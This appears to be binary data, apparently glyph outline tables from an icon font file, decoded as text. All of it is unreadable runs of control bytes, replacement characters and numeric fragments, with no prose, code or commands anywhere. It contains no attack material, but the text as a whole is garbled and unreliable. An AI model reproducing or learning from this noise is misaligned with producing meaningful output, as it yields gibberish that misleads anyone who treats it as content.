$;;;;;;H<<����/2:I%5!6767>'.#"&76767>357$4&"23676&/&'��YH0!"!H)("M["/��
'sZ&
	#0
162R@]R/"*4	.>>XA76�


�bD!3$4=B����
#)1AI7>77&'6>7&7&504576&'67&&7#!"&5463!24&"2Z(C�2!@�. KE.##DI'-(	2'4/0���`@^�^^��3$,K+%� 	71	�$(4
:".d %0���`���^^�^����32+532654&+#�rE> <_:��V_dQk@�F?[*P@&@a?@`7������
$,����>2&&#&676.2#".54&2"&4'3237.670>636"'&5"5&?"1"&46323&''&676767.'547>3>367.>>2'%6.67>4.'&""232>7&'&7>9
	�
�
		�


	N5j!@
	--H
 b9"
$-	6*"(	��
'
G	3	�(#	H�

l						�h

	


]
	(	
.%			�
O
1				U
.
O����
#2#>%13#67'.5!456WANdE#-�3
TQ `AWGDu�Oq�S�	.%$/	�k"/0ijY_���"3##5#5354632�UI^MM@5+k?[��[H9?Q����2'5.>7'7�\�S�FK")
&6MByn9yn�yVDk+*OCEF=0��=<�>����####5353533##5353##5!###�@����Z����@����������@���@@Z��������)<K73##576=4+53546324&#"#576=4/73''7'73733r]M;�	&55*/E

�
!	n
*+
&
&�3�"#
�32.*
 ��"	�	(�9-

-%
&&����Q�72+"=4;2+"=437010101010"01"101"1110101#0**1#*1"#"*#"#0"1*#"#*#0*&*1&#"#*1&#*#&'05&'4.#04'.5.14"5&'014&5&4&4&4&5'"&</0&1&54'4&'45"41&54&<&41&5<&<&504'41'041&5041<545&504145041<'45<547676767676767676320154+"#54+"#54+"#54#563232=4#"#"&#"5654""#54+"#54+"#54+"54667676���.;ed<.*33+
	

(,,(�4444}AOVSOA

��H�1

Z�H	LL	�����	(>.'&7667"&54>32&760m5	%#�01}~�~:c;4/	
	M`5m	#%%1U�
	19YY;c:!4��H�lw�5'.54765&'.546765.547.=46723>54&'&765>54'&76"32642>54&"6�ss�
�b5T1E9
4>N>dd>N>4
&8 iQ@i=
�

�	J15t����t51
-1d�
|h
Dc8Dr 
g>Eo\	
 	��
\pE=g
@S-V�h|JrC0-
�
"	
����"%2#"&54632&"327572&+5DDg]��\[A?&nNN74&%34v�
R�\]�B?'NpN$"q50*Y���� L'.7>327#!"&5463!245#"'.#"7670703'&'4+76,*
,!�!��!!P!v(&4
<4.!#O!C%!
5 *-"O��!!P!!�"�(*$:<, 
 
��c�0?732327676564/.'47>32753.'&"67>'.+

5'*27"3L+	O;2,f%IE�+D"(A"<-0	1'* #'Q;% 7@=���"�EA1QU.8@���%3!!'S�����6Q��!S�Q������������	%'%	&54'77E������<AA���<�ݡ�����
(
"@@���< ��@�*Q74654'.54>54'71"&5>54'#".5470>54/p
O,+!(!�C 	D�
8* >105,9)6
CF-4,	 *
P��~�&-OVd�#0��������67&'6?#64>4'&'.'&'4.77&"&576&'&'.77>2"'&'&637#"'&'.'&6?654&'&'.54746165>'&767674765&'.#'763263&67067>367632"22#66763267&#""67>76%2726767&'&#"&'&#667676;2&'67&76767>54/0&5&'&7676'&'&#"767&'&"'&'&#"45673&?67&'&'"276'&+"767#7>'12'"&/327"'&'&63=.%
		n	
%.? �	

�
(/((/	


#	




	(

	
		��	
1		t

	
& T  &	(=5
	f>v�
	F<)�


1

		+			




+			
4
�

		e
%(--$#
			
			
			

#1	
	+�
30+..+-3


!		!

	
�*+9	0@@<+*�	�

	����
���7#".5/267#"527654&654#"0#"76746767476'&#"47>76'&#"#"7676'0#&327717670767464676767676767"./3276732767>54&#"'&7>7632'.7&54632?64'"=32�%i��

	


+-*		
	

�ttD0
=9
DF9P	P


�	@					!	_P	

	
 �


1@<)���� 2#!"&54637#.'#3����Q#	%P���`�6�-/0"�g����!.'>72&#&'.=4>76&#"#"&#"0+".5&54>16&#"#"&#""3262324'&'.46546;23262�'��')N		n$p$���(&s)�k		1Fe

	::	
eF1			+		+	�����$>&''&'&'&67>./�O:
 # &
o"*>$!	
	THN(_-.R&`J7-#AM<g*:1*!<����6A%'#"&462675&5462#"'"'&46327&542654.#"�
+�
'/?L6,#2"2e9)(�s+_=>I06L2"2",8}()9����5EQ2"&4654""7676547676762+"&=4632>4.#"��ed�e�	r
X	/+<<+�+<<+y4Y33Y4Pqqpe�ee���
�
	
q"	4<+�+<<+�+<�d4XiX4q�q������=%'.7>767>5&540'.7>767676763636~*�
&
 �<,
43&#7Jc<
�	+Sl�����Lcs������� 27PZg������%!&'45.'&>767656.'&'&'.7>74.5&7>7676>367>7>72>5&626.5&6'6&'&'7676'&'.&>.'.'&'&7>36'4&'&6'>7'"76'&'465.'30'&'&'".4173&'"7<5&#>7<5"'&'&7>7&#&'342;&76'4.'.'636>&&>7&721&'&7&72>>7>.'.56'.'.#".7&6&7>7&'.'&'&36�
�Z
. 	
%g��4		k*"	6#-6, 
	
FC�
	
e
"��*)=�	
9$S

	�	#	�
`


$!�%*!
�8/V%	 %!

		
-?	
(|0

	�"^4	F
�$'?^2

	!%
			!)
�
	 
;

/	
	

 
& 	Z
)/
#
		D	'	
			$(
	
���">[.7>3267"1326'6&'&>76767>320676zX/lȯ/6#q?FpG3C		7a�3�	57K�/+&F-)
!�

.�"3	?�6ȯ/l�W8>��
6�>u".)KEP&/ 	
6
	"	!����6!!75##"'3262654&/.54>327&#"#"'��@�*"-"c'
	
!)"
		

"��@c��'  

	" 0
	+����B2#!"&54635##"'3262654&/.54>327&#"#"'����*"-"c'
	
!)"
		

"���`����'  

	" 0
	+���.D\huv?7'&'2#"&546%016"'&7'676'%&767''&>%2#"'&'&'67&54>2.7>3'654&'7@<1N/'	1;C3$)z/	
-?��.'.r?1N/'1;C3)
�	;H^uHQJ "":';B		 +#'�17D5		02J*(}1
,;,&18D5	$'<A+'

i]uI];6Fw$44#!!0����2!"&5463!24.#"326=7>/76&'&���`�

	<
!
1(&, `��.�	*L
?:


@����7>&/#"&54>32�SFK[>p( $'" )NGv 5ks6�L**/%$*������2DTa%&'&''.'&767:7.'&7>366/&#"#"7264&'&7>7676'&'&6~PK�	
?k
?A	`!��8	A���h�p3>�:[\	109E�eD

r����.	O
RK�	��9T1d�=
N������%6Rbx%+"/+"=4;254;2#2+"=432+"&=4;272+32+32+"=437#!"&5463!24&"67>76! R-�.�0"��"/0""/>_�`N;

.9"�G,*G,*GG<G9<GW��"/0""/0�6NN61J,'u	*H3'&5%3".=4&3#'546323#%53'57670&'&=325N,�/''<*%8��M*#&( -Mo�+
'"
M/MM'�+<.#MM�(6F
4�q����	''7'7�@��@� ?__? @�$�\\�%��\�$�77$���@�2:Bt7>3>32"".''&/*.7#"4;2#"4;27&767>54&"&'&'&'.54>32v


		

���(XX
KhK
	+J+B^�. 
A		�  @  �
,1(3HH3(1,	
'
/*G*[@/
��$4/5373#576=##576'H-�m_�'&�'l3�3	2	6��%��%&���	>>	��+�+O#"&54632>'&'&'66&'.732+"+"=4+"=4;2=4;2rnSg��gS�:&.��/
.��7�&"* b1j((0((0���gg���)�;B�^B/	)1-r+&U#* 
n0((0((����3#73#3#73#����������������������!&=4&"&=4.&5�,,*+$ ,,��t������$2"&454&"6754&"6324&"�Α�Α�"!�"�"/��Α������ ��=�����%3#"&'357#&5462#5'`lAR,Bq!lhh��K
�Α
K��@$6A7�iiP')g��g)'�������6G\h%&'7&"&'>='6267&"6267.'&47>330#'236"'&'.4"'6?7*�*h+&$:FF:$'�

,d,

0��>�>,,>VcU?,,�	#:
�$
�4&&J	
�
�-F%$G-�
 -EEEg:T&&U;g�(5{

����;j"/&7676?6=4/&6=4;2#"/&=4?67#"54;23254.'.54632+"'.#"�	>

/���20����0,b#7
",(V0).&<%j�jj�
���kk�k�!D
@
	@@ %%#53%!#5#5#35337#3537#3533533    ����@  ��@@�@    �@@�  � �``�� ��````7�G	DNW3#'#73%'.'&5#7327676&+"&7676763#";2675&66'67676&'&�-093-117�)O%�X

	�
�X!=	=%&i1	%
	 �jj�rs6&'	(
$
 	$#�*h
����7FNV^fnv~������:4>'4>7"&.'."'&5476324&"264&"264&"24&"264&"264&"24&"264&"264&"24&"264&"264&"27&'&"62X
	

#549 B�B (B^^B(��XXX(>�>	O��	

	
!(;��O5005OBB11B�SStSStSStSSD'  (
����	#/9AT"&463235#737'2#547#'35##5##5##54#"35'5'57'#353#"&7'326�g��g���`o)F9{�!8)�E
DEDD$	
8�Α�� �?�.

471M/:HJ0!!�gV

	,��8�
3m%#"'67>454676765&5654&.3276'&#"'4>;>3735467;23232+!".='#"&'�6) �&.^O8		,9

�Vb
	��
	�&:/I^,�5
(<[:4%H
R		K
	�	

�
���
%#"&46323lLLllLLl�Z�Lll�mm�������"5#"&'&546322>54&#"#".672654'6r<R'(F S{VSS=>/mKPn/?@B-$9%%B&�?WSn	+?*mTX~�9Qf(PttP(fQ9,A$5A	;������!,AI%#'#//75'737573724&3>7"'&'&476762564&"C	
				
-
	�^8�8)8? 8�8��Y~ZZ~Y�	 !	
				.0_87*80?!87�YZ~YY	����FMl������7&'.'&'&"#67>3021'.'&70703'.'&167&'&'57>01&'&76"45."&'&74"'50>767>0&'01&"'&167>76'0'27:63231'&'.'&'6160&'&'61�"Q

.		K"#8)'4
		R?(&$

�
�D"%#
F
3�*
%=C"'�"


!	"
	(
	)�!	$%\

	�	h744D	"//%	,
&0		



��#	�
	
		i

�	
������@�(;%57>'&5676'54'&'.7>??;
	͗

e%'E=�^6L;/=�� 		�a

.PLI66	#8
U�
���
<97*l	#/6#	1������(-&'&67%6'76&7'&>7'6/��##i

����a�t	S	jZP
�Q
\-!1(7����	��=	�������%GV%+3'&=46;26=32"32>54'"#"&'&7>;5#54>76#'2>4.#"�	�k5656 k(((�	�%$�k38r		�?.)&&f )0��	�167
)

			f �	
����/2#!"&5463&63265#"265265#"26=&6a'88'��'88'2	8�
��
	�8'��'88''8�	
�
�8	����U2"&46#"#"3232#*#"&7676#*#"&767676&#*#"32327656323276�Α�Α�	|	<	
5

'	
#.[A	��Α��		F5	B?F+E&����!@GQ[#"&=46;2'&#"#'#35>32#"&'365654'&'&'&#"32767&#>33264&#"3264&#"@�5KK5�5KK�	$
	x		S


 #"(3\









 K5�5KK5�5K��Z
F%%"'fx����	%(%'762#"/7/7676/&'&>&5��(BDrB�fE:0
�]$#
0"-��{&�9b6'BsCf�#P%
"
!)%0
@Sk��>F��R�":FNZ'.'>'.676&/>62654.#"0676?'".5466&66".5&6�;++;8�>"L@(
(?L">��`�?j?a�4,B	
"#=##"w	##	V&pq%%
 	$3?G ; 
��X>)E(X>6),8
r		
+			����2"&4'616/&"37#"�Α�Α�eJ�
"
�ZUTK
p��Α���w(�

�cc)����x#'+/37;?'77'7'7'7'777'?'7'?'/7'77?^6JN�."7Z %#	8	8<+!)#+.|G7-+3=5PCBY".',";##B1 
"
&		/
)�@
H96�`�-2W�B����@D57'.546'0'.'&/?>54&'514"�D66&/$:MO�<)	&,$-5+7(&
,>҃�s|57"';6[<<Z�X,

&1	:%*>4*9 0*
(
<��7!>'#.'6X-~w�x2M
)ps^`	5EE"�9m<Me�>`�L-T?-
Q����
'#"&462264&"��.<Dbb�b �jKLiL�&c�ccF7,LlLLl������MQ%&/&/'"&'&>?''"&'&>?'&>767'&67676767'�-
^
	4-5
-]
-	
.-
�^]�/
/ .

0

Z

/
///
Z
9 Z������67&>&7&'&'"'3>56'.54>327<
��w	C
!,z��'/)7
/
("2 
.8B�w	��<	,)+&$*!	"&

������=%/&?6?6/&/&?67/&6/&?6,�	�-�]TD:�4-�\_92�+�	�*��"�JRA,�V$�H\7'�*����� 2>"&462##"./567>324&#"'.'3264&#"32�$3##3XC/m1!:aGB/5�$&%�, $- (3##3$>/CO!,
k'e/B5�4%
&&	"�?,#-����A��%'"'<.'.'.01"'&76&*'&'&'&656&7>4645&>'"'.'&0#"'&'46'.'&54'&7>5&"5.6'.767>67>7>7>23>32307>302

			+%
	>59	,

	�N	
		 	'*
	
$$+-


,	$*

!

			����2637??7'7''''/'7'?�'8P
C]8Y9}�R�sf�|�1.�+l&
,ND&@'$J
.3D6
{l&Jc&Tz8a	%��E�a@NZamt����%#"'232654'%.54632&#73254.54632#54#"#"&'73"&=3255#532+53254+5#532+53254+54+532;2=3+"75#532#54+3#;2=3+"7#53##7373#5#'#�ApC#$e�3.5��3.5�e%"
e�<		
	



v$"'

9'9		%?4';� 6J5+#1,"10EJ]

	
		
M777H+HH+?=>
		?


	U������/#?6'&'&67%6�Dg2
��f�]��"L0
i�� �����(2#!"&5463>'."354;2+"=#����pGNhN^DD^���|��W84FF4D8����'575'7''7���X��eW"XVY@����-uKK�:55/7����#'+/39=AEIOSW]cko"'3'#4=3#&'7#&'7#57#57#5#5#57#5#5673'5353'53'3#&'!5353&'!'673'53#4=3�v0��gg�bnfggggggggggggg
ibgggggggg�
%ggg��S
t
tVggg  �
F	
#E�#EhE

#��

%JM�gs��
%	R

"��y�-In'.'&?6?>76367'432'&5676322'&'&#&56/&'&74>76�
�
4
	�5"�

�	%�	�%;
!�&�	7"





���"			���	}�����7#&'&761'''''#'&'7&'7&'7&'7&'7&'7&545'767'67'67'67'67'67'6?27777774&"26"&462654'&5'654'&5654'&5&=#+&'#&'#.'1#.547&+'&54704&5232673275#327.'&�,+-"%
$"-+3378:;	7;	16(."".(61	;8	<:883Jg�hh�OYYY|
)

�
	
					

>k

�" %$'&&&&'
#%"	


,'
84
A?GFHHFG?A
48',!�hh�g�~ZZ~Zy

Z
p@$





!eB����;Q>;2=4632+""&5&54.+"&=4>2;2"'4.5&6327632�	c 	
!"d
e"!
	 c	$11		CC		a3


	

% 	



	 %


��UUvv�����3Zes��#'"'.5'7#.767>;6&'.'*?>72>'"5&'"&636&'"&63&&54&#"432'.'&'&'./&6762?6�!
"J%	
	
$	0d$#4U 
I,-)0)
(D@
�
+(%*//E4:L
?


	

	

�}\&

	4 " m0�Nm([)/)#OO
#f 8!,4&	;C
K�"


		
	
����22#!"&54636'&6'&'&6323276���L2C!	%.B@���f�@N		 *h8
/>4VR��`�,U7"&/.>;2326?>;2#!"&/&;2326?>;2#'2+"./&#"+"&?>3i7!$$!	8

h8!$%!	7

�8
!%%!
8		`pK
K	p
pK
K	p
�pK
K	p
����BRa2#"/7'&546'&'&'&'.'&>76'.'&'"#"07>2#!"&54632654'&"7�m'(N7$2
�			


e���B^0.�]T#E'(56M
0 &7o


	
��`��]A@1.]A+%R����/:�''#/'7''7/5?'77'7?3772>54&"''#/'7''7/5?'77'7?3/3267;?3?'�	

w"/!!`/7'6''
*
$%7&66'5%$*$/>,%:
			B!!/!(
#&4(66'2#&)'$4'4.
:&+>/#����
@J2"&427&/7654'&54632&#"23767/"&63376>54'�Α�ΑE9k�&$DC?P@W&G9<		R0"%<		D3<��Α��gAl$+��
��	G�J6 #;-�_		��f=92%+����+AQ%'&'.547>''&'&'&7>7>576'&'67632%'76"&'".rG;14;3
Y6T�Z!	69

`+#��	?y2
1)�W $	!/_0R�mU-	2G)" 		1A<"Rx(
@�
	


����7#7&546;#5#";�W@`KU@R7&2X���&gMT��8;m��.�533�p8R^4y@�*������<�D/;C\gy'&7670#1#"&#"#'.7672326732+#73264&#"&54?54#"#4>32#5#'26="#532?'3373u

nI%*#�6&
"n3$#5	"!
9#$B�M%�&
a
	J	�ss���@�'DPj|+534?#"7#!"&5463!276'&5&7&'&#"&#3262327674&+3532>4.#"363232737##'##"#3267.M�� ��@
	
	
>




�3
Z
&			f$77Z

��`�

W	(	B�/
	cQQc��l�'.871#"&767672#&'.'&763276&'6�" �

_3+3U*'(%+}"
�
3>Acf5</x1.BAa-��F29H7.^
J'Gyd������&8Tb62#&'.'&547>5#"36#"'&'&5&76762"#&54&7676'&`p99%	1v$,'	&&L		
	�Q(
/Kc  	�ܙE%	r�!-ؼ*�?	
^(z\#!���

����;`ko������"$'"/&7672?6=4/&6=4;2#"/&=4?67#"54;23254'&5432+"5&#"7#"&4624"7#&54+#5322&4+3%/&=4/&"&=4?6;2%/&=4?6=4641'"#"357057&=4/&/&=4?6721200#'"=0/&=4?6'3'<::9:::+
7	��%$=>O===%.�$>%===Q�=>==KL!B!!B	BB	B!!B!B	)
�_,		,_$$d�$$G#	^�

##G$$*##F$$6�����-V5>76'.'&7676&'&'&'.77676'&7>7676'.zZCyOVR
%'-
$X+C;0-@(7!5
�c5Y6�c�	1c>X�!22'1#+
^."U	9b:;8 1	1-.H/HX\w
<c���<JRZqy���������&'&''.767&'.546767&'&67667>'676&'&&'&'67673276767&'&'&"67&'767&''6&'6767&1.67&'67&'&'76767#"'6'&'767>54&'&'2&"&462�*47-
;!!?	+52*			@"!;
!"

0�
'	



.
�		
_�"!4%


#*'z""
2
�!##	',#

}&&),0$>*		,*	*?C-R'6�
�JF
A

aN3$
��"! 
d	$10." 

!! &&����
#'##73'#'%'7>�MxNyT)A���<�
�� QQ���	88	7�I)P����%+5352>54&5475&54654&+532#"'73254'&'&54>32&#"23#"=#";#"&54654#5654&546;7#"'73254'&'&54>32&#"'2#327#".5&634#"ej+"*	
	��
+

K�+	!*	
	� #_##-9�
!			!
  
"	!*"	

<"6�	
"	 
"
!		"�
;"	

D+!#
&%.B���������	%72'47>&'&'&767&/"'&7676767&/#"&?#"'.7671'.767>7.'&67676'.'&767>'.21>767>2630>20127670656767>763206767632066'0"676'&2>65417654'.�)1%#



	

	
	<
M	-# !9^Bw1%H
-HWhK{;
!
'#�r 			"�p[
	EW,
$
 	"( 
		%
>%$& )75"*;/Z"">A'+	 


V

	
	:
		
	
�"-&j32

��337#'e[��08ਨ6rr����YY �� ������?''373�&&&� �� R��0n�\\�J��bb��$��BB	X�(	0D��7'##7'3'373537#5#53".46767624.'&"27>"&5475"4753#5##5353#5##535&/3#5##535'"475'"&5475'&5&5'43>?##7#'#077'373'k4>>>']>--�)d�


			
				
	W


P

&	&
	P

Y�AA?>@@�Y��**��c+<�``���ttt%

		%D		
)��)
Q((+��y�y���%'.'5#.='./&/'.?#+'&6?#'.5'"&'&'&'&4?673676720326?>7>;67>2?>026?67>?6766>?4567>72>?>7>3>?>6?67>'&%>'&>./.677>/&�
			:	

		
	
0


	
	

��

	

d
	�
:	
	


 


		
 "
6	
	$-5:/


-=(	%1%

m7
,�
	"
	����.%#"&#"##"&5&54622>3232632�
7%H2B"/"
%P
C	YNw"" ��p�7#3#3#3#5B22e3�3�2~BL�L��L���
L�)	?G���7573'7$"&546253#57'+'.45454>;654"2'#''.4547&'632&'54#"'&'#5.6?>767>36'7&54"2�&&)6�::�:Y
 	 k
 	#A
!	
:2)@&
 �.�`

x

�nn��w		Z((
T	 6^1J
	

'9((
��r�#'#!3'3��Y>>Y.CopC-���tt��X	<�D>RYhsw3#267#"&=6&#5375#"'53254.54632&#"#327#".5463234&#"'2#"'5362654&#"53�""	
�
,&_,��!SW  %"X.
	
q$#,'	r,/&&?	
"�*	)g�;$
$^	(
*+		!$#..3+%((2
�{B	!����k�!#"'53254.54632&#"�!090 l\QKTH7 090 iXLBDJ1%;(KO �.#8%KV�$����#327#".547>772#".546�)3&R$Y;	
:F$z�%%rYW@<O~�44'X8,=Ed�*Yn���,56767676#0#&1"#&'&'&'4'231'&'#'"54=46;204>3670600137654'&'&723223#"#"'4'1'&'&767621450454&'&5<5476367:450414#.'&7676"&747676'4'&'&""#"&767676'04767>56;2'"'&5<:3767>76'&'&5&3232<C!//UN+9%&)'QA�

		"
.!	�
	,	
#



			
�9

"{
!	:H�
***
(
j		



�	

!		u D�"	

=U&'��@�(8r��770=476'"'&.7676232#%#!"&5463!2#0&#"376767674#0"1"45.'&'&#"#"6761323250=4'&'&'"&+"176760"1&'&'323254=01767656'&'"'+01054&5&+"&'&'&'&'&230;21676767676&7&'&'&32376213676767674}�	"� ��$
		'~%
	
�				�AH((926D # /$.

�$#


���`,	Y2eT
<j	Y	T�<
�	
0

��8�%'7'8�������]]��\������2#!"&546337#53'#35�##��##�Qo>BvX�`�#��##G#W��tt��r����2#!"&54635#35#75#75#�	

	�l	

	�(�xxxxx�
	�l	

	�	
����((P((P((����27%#!"&5463!24'&'.+";2767>5�__��`*GrGr�66�`�;
,<,����!!5!3535��@f��YZ��@
Y��YZ�x/[nz�+"=4;2+"&=6/"+"54;2632##"'&=463276/&'&76322'&"'2#"'+"=4>2654.#"&2"&4�))`

))$�	$!5 &!+:�.?@-!)# $$$�"��
#�	{�Q�#"

-

i?[?Y�+	�%%3%��i.?f{�"264%2".54>6<.*#:>732"#73262#67>'.*##%64.*#:>732""#��������W�VV���V);GR:
x!G 

	�%			
%
%�x!G 	

	X[z[[zk-M\M--M.,$ �	Ge�6,�-	"`?	Gd�6,����%#"&462&'6&#"3762#".54.
!&e��ˏ	^GB]]B%R::)%

�ˏ�f3.Fk]�]�:R:%)��@�!-9EQ]i+""'.+"&=46;2>354+";2=4+";2=4+";254+";2=4+";2=4+";2ZI>=2Z�$88$���������������#(�.##.��@@v@@����+CUn|��%'&767>;0?'.47>'7>&'&766'&'"67656'&'&7672"67>/07'&76>?'&'67'&767Of8(
(%)RM
_0%w&

>eC
"./'G�32*"
(�.�37DG$�'�T4(�

YK$!C�	
	

(2!"�


G2��##
=	
-

	Z
�
	����G1&7>01'&".54327>3270>7>�"$
&',5+:3'<#5	)bBU!1&A5f7
"2�B
	7 	`	fX1!"4(���� -%##5#546;2'42"72#"&546"32>54&;M
ffEE#i��df��jVuwT4]:v�fxxf
9##"��hk��ge�-zQSx2^;Uv����)B2#"&54632>7'#5"'774'&7">753&654'&�i��df��VxS/"]')""=j@_$" #	0-;;��ik��fe��$Sw)&&"
�]+''"
9V:<����13M2#"&5462>741'#327#"&'#53<5#53'7#7654&#"67632&#"3�i�0>J&f��j!<%"
�[8
%-GAxCN�vUl>Q&:"!F��i+N<,�fe��=#82.50		#Sx�<Uv]$	*0
	
����!%:2#"&54627'##5#535'#53'7'7654&#"'3733�i��df��jlDR@=@@:	x�7@evU :*QB(+B?&��hk��fe��=c$$88''8 Sx�3-Uv$3V
`t���� 2#"&546"32>54&#5#5�i��df��jVuwT4]:v	�����hk��ge�-zQSx2^;Uv�++P**����#72"&42>7&'327#".547'703654&#"632&�Α�Α�%E5�$!.&'O3X�wS4YJ!D. (0
��Α���/` ,4##0`L0�Sw2*!4)����(4;2#"&5462>54&#"2+5254.+'2+#526&+�i��df��j4]:vUVuw�FF56"	^2
"?
��hk��ge��=2^;UvzQSx��l'Ol.,�C)����,37;2#"&546"32>54&#".''574575#5'?'5�i��df��jVuwT4]:vM :D	@?;C�qq(%'Y-��hk��ge�-zQSx2^;Uv�F
@F>>f,.-/:5++����<2#"&546"32>54&>32#".'332654.#"3'�i��df��jVuwT4]:v�$#5<*+'>4$
211��hk��ge�-zQSx2^;Uv�*++!;(.$.(+",11����s2#"&546"32>54&2742763276;#&/#"'4'#"'4'"5'#"'0&5'#"/+53767463274>276�i��df��jVuwT4]:vQ	
:3	
				
4-
��hk��ge�-zQSx2^;Uv5l<

P@
	a
,	 \

LH		W_WT

Y9		LbE\Pb
����_s2#"&546"32>54&3#&/"/"5'"/"/"/+53767627427627>7427624+54"#";2=�i��df��jVuwT4]:v;33+F��hk��ge�-zQSx2^;Uv�,S@:HQIFN+
I	Z

9PCT^-
E3
]	����4<@2#"&546"32>54&2+"&=#".=4732354735##3�i��df��jVuwT4]:v�6��)7l�ll��hk��ge�-zQSx2^;Uv��6�6se(C�����(192#"&546"32>54&2".4>"76'&3254�i��df��jVuwT4]:vr:*		*:*		G,6%=	
,��hk��ge�-zQSx2^;Uv<+/6/++/6/+Yd
	.i
Y?�A9AMaf3#7'#&5#"&547#"'#6=3632672354#"#632'3264&"75"326%673#"&54632'.^"c$=) ('  &.
C)!"C0%7��--�/�d)+!*)*)$+"--�6t
B		
�P($	!!+m00)!$*&&������Vbr���7"&463262"&47#>''.7#&'<>767&7'.57>32672%676'&#"46>'.#'?76'&'&1?&'&''#"/&7&7&'67676%7�


V�1"?*/(	
'
	
/$9��		2##&h		
~, 


	
,.DXn&��
.;,N
;*'!(#


 $<�
?


%
<g%#((	

	#$60I^/ �������3^'26?'.45454>?62<.'&'.3547635476�

 fM&

325	
.�/KDD/.
H2	
%-7..�4 

 4r
??$r��E�2EK%#'#5.5463253:654&#"22>54.*#27&#EXCp(!%cf��xO�N�-E8�
		
Ft`[��
	
	
�R9rK	>>lGQr4ZC'A�
%#HBCN]�����<_i!!%5"'&'>54&#"'22#23235".4=372><1#3#"=463274.#""'5632��@
<		$


d

%��@r!m.*
�
	
 -E#���!Wc7'&'&7>'&'47>767'&=&'&"#&=76767676'&76760'.67276�3$#�(f42,E%D	d(\N;	,:�m	�4!Q!e"(
	
!!%$,v.Ts7%G.'
1+	1,i*4
�
 *%����c2"&4264&"2"&4264&"%'''"'7&'7&'7&'7&47'67'67'67'627777'�Α�Α�ƍ�ƍ��������||�|�J=7$

$6>JMRSNJ=7$

$7=J
NSR��Α����ƍ��?�������|�||�'$7=JNSSNJ>7$

$6>JMRRMJ>6#

���'?/?557G$##T))33d#$$T33*,,+y�--��::"++,��::��-����DLRX^dj"&462"264'./'6373#'#5&''7&'#5367'76?#.'%#63&%3'6&'756_Α�Α�������8-18.%-D 
;;	RR	;;
 
;;	RR	;;�"
��"�"��%.8-�-8.8�Α��N�����r""+R	;;

;;	RR;;
 
;;	4-8 
%.8p.%-88-%L""���2Js{���3&=4'&'&">7#&#6726&'676&'676727""'&'.232.#"'.#"&'5>326="264&2"&46"2642327367632&#"'5.'"&'6�
&
	

O

	
&)=!(&?
:(!1	&(:
?&(!=""7,�

* *

�xP5[=
y!')

)&@@L""
3


++
����r%>7#./.>?.>?677'7'=57&'>&'>&'>4'�

#,F**E-"

	
&

		"????,

	J	(
&#+!''!

'5,* 5)#		0[>060+
!<-'D$0		7..��.7		0 U*1P-1-713D#
&'544J������Rk���&76567<'45&'&45&567>767>&#0.'&7654'&'&'&676567>75'./564'5'.54'&'"'.?'&'&'&76767632654'45&5&'&'&'&'&'.'&/5'7>32674&'&762626?32?#""367>76767>7676#"7&54'&54'&5476.'&54'&4367&'.66'&'67&�	

	

				I	X
D)!
I&�+%&#%@
	
		
9	'					


	
		

	&-
 	$	

9,:L�8'', %%	�������^^��K2322230##"'"'*&#&#&'&'&'&'&'&'&'&'4&54&45&547<65<656167>567676767672636212":372676767676767676767676'4&1&'&'&'&'&'"#'&67"#"'&'&'&'&#4.5&'&'&7676767"'041465<5<5<5456767676767654'&'&'&'0&673676745<5<5<645<5<5<5454512174767676763632367676?0'&'&'&'3"#"'&'.'&'676767'&'&'&'&'.'2303232763667676767464567<5<545<54'&'&'&'&'"'47676767610#4&'<'"#*#"#"#41>12676345"'.#4&#41:3670254>721633230"""02220#*#"#"14=46123#"'&'&'&'&'&'&'.50'&'67<7676%0#&'"/476767676767676367676747654'&�


(+		
5
+


+	
	
	
(!		
'/
u

		
	�	

	f
	
	


 "
		

	&

		
�			
	t
		





�	'		
2#

,A
&


-<

	
#			2



	



	
	
	



	

:
$�%	
	


	

		
		

	
&&,


 

	

	

���ag62&276767676765&'7>767677676'.5676'&'&'&'5>6767`J[+,(!B.
%$6 $+.1!,
"1  	(M;�7< 3	
	�93-!"


	

!'$"
-*6$#/62.=4.I##%>,14_0
����!)1'62777''''777&47'6"264&2"&4w[

[wF;FF;Fw[[wF;FF;�gHIfI�H44H4�F;FF;Fw[[wF;FF;Fw[

[HgIIf%4H44H
����+5?IS[iq��2"&4264&"%#3##5#'353#535##3353'7'7'7''7'7'7'7'7'7'7'7'&2"&4#535##3353'"353&2654'#3##5#'?'7'7'�Α�Α�Š�Š��TT0v%��IS���|S�	
�		
x켅���BT�Ɲ(u4T_Fp��?��}1�TT@s,	�
��Α����Š�¿#/��.R\8P��]		


�
R	������!3R2���RARA�U}XM<3?��8 XF	���������������''.'4.'6'777''4&467&7467>'.'.67'77'??'?67.673'''''776'7.'5'7'677&'67'677&'6'4&''&'47'67&'6�			''
	
Y:k, !,l:Y
		
&
E
	(		!
'�	,
	' 
((&""!#	%
% "!=2b']<&1xx1&<]'b2=!"

%
%	#!""&((
 n,>'
L
�'J
'? 
�����?^�7.676.>?3:1>'.0#&7'&>'7>.'.#"56&6762&'&5./>7>54=3K


H-u$=,#[
'16
/	
	
	G+pH
�
%[(3N
>-#		\	
)3}	F,wG

� ?.$		['21
��

	H,m������!FJNUf���������'#".637<54&'&767&0"1##'&'&7636#'0&7/7'&76'&#&76743272#"./"'.7'&>6320%367#>?/"1>7>367'&26'6'.1#&#"767>0'&'&'1&23&32236&#4'"#*2>132#"'2>71#&'&6723676&+&'&'&'&/&'&#"&#"&'#77767>517463#&'&#"76746&&�p


	_
p,
�
 .9%	3BB'


	�n
	&!#""	\ -V
K#E

	
"(	

9D$
	K,	
	
	)3�?9(	w�	
�	�	<


	0HJE
3	

.
6.#(F4H�"'�


�

&5			




n 
����
'?'2"&45'5'5'757757�"!!"EΑ�Α�;<<;!""!�""B!!�Α���W;X<KK<X;WA!!AA!!A��d�#+62#"&44>2"&72"&5>264&"�
j
OIii�h-PnMMnN�


�g�ggJO�!#��MmMMm����!$"&462#.5467552654&'7'6&&6��SuoPmm<S\�\'!.H�6&&6'=�xSQv&??(Z=A\\A)F<����2#"&4632#&#"7'&'.=&76322�BRg��g_Gdz7%"Ab@	&HI1�Α?QJ 4!!
�;6	
	!=�����'=O?62"'764&""&46"'&4622?6"&4?622?62&4?62"'&"��R:w)�)���R)��R:w)�)���R)�i�:Rw�(�x��_:Rw�(�p������"29@KQ6/.=4>7*#35326&'>.#*#3533'2+5'2+57"32>.2"&��

��
j s
 )
		
B

�)**�

j�	k

k	�	[d$#c"d!!R &!' ###.S2#"'#"'.4&54632>32>654.#"#'&"#'&#"32?3327�&1
	C==C	
3%-	$
.8
,-
:
-,A !'(
" ~/$
 N+F66E7"# -##s��  ��
